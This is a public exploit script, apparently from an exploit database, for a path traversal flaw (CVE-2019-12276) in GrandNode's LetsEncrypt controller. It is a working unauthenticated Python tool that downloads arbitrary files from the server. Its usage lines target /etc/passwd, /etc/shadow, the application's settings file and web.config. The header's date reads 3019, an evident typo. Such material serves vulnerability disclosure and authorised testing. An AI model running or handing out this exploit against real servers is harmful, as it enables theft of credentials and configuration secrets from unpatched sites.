# Exploit Title: GrandNode Path Traversal & Arbitrary File Download (Unauthenticated) # Date: 06/23/3019 # Exploit Author: Corey Robinson (https://twitter.com/CRobSec) # Vendor Homepage: https://grandnode.com/ # Software Link: https://github.com/grandnode/grandnode/archive/728ca1ea2f61aead7c8c443407096b0ef476e49e.zip # Version: <= v4.40 (before 5/30/2019) # Tested on: Ubuntu 18.04 # CVE: CVE-2019-12276 ''' CVE-2019-12276 A path traversal vulnerability in the LetsEncryptController allows remote unauthenticated users to view any files that the application has read/view permissions to. This vulnerability affects Windows and Unix operating systems. For more details, see: https://security401.com/grandnode-path-traversal/ ''' import requests import argparse def exploit(url, file): session = requests.Session() paramsGet = {"fileName":file} rawBody = "\r\n" response = session.get("{}/LetsEncrypt/Index".format(url), data=rawBody, params=paramsGet) if "UnauthorizedAccessException" in response.content or response.status_code == 500: print("Access to the path '{}' is denied.".format(file)) return content_length = int(response.headers['Content-Length']) if content_length == 0: print("The '{}' file was not found.".format(file)) else: print("-" *22) print(response.content) print("-" *22) if __name__ == "__main__": parser = argparse.ArgumentParser(description='GrandNode CVE-2019-12276 Path traversal & Arbitrary File Download') parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL') parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download') args = parser.parse_args() exploit(args.url, args.file) # python gn.py -u -f "/etc/passwd" # python gn.py -u -f "../../../App_Data/Settings.txt" # python gn.py -u -f "/etc/shadow" # python gn.py -u -f "../../../web.config"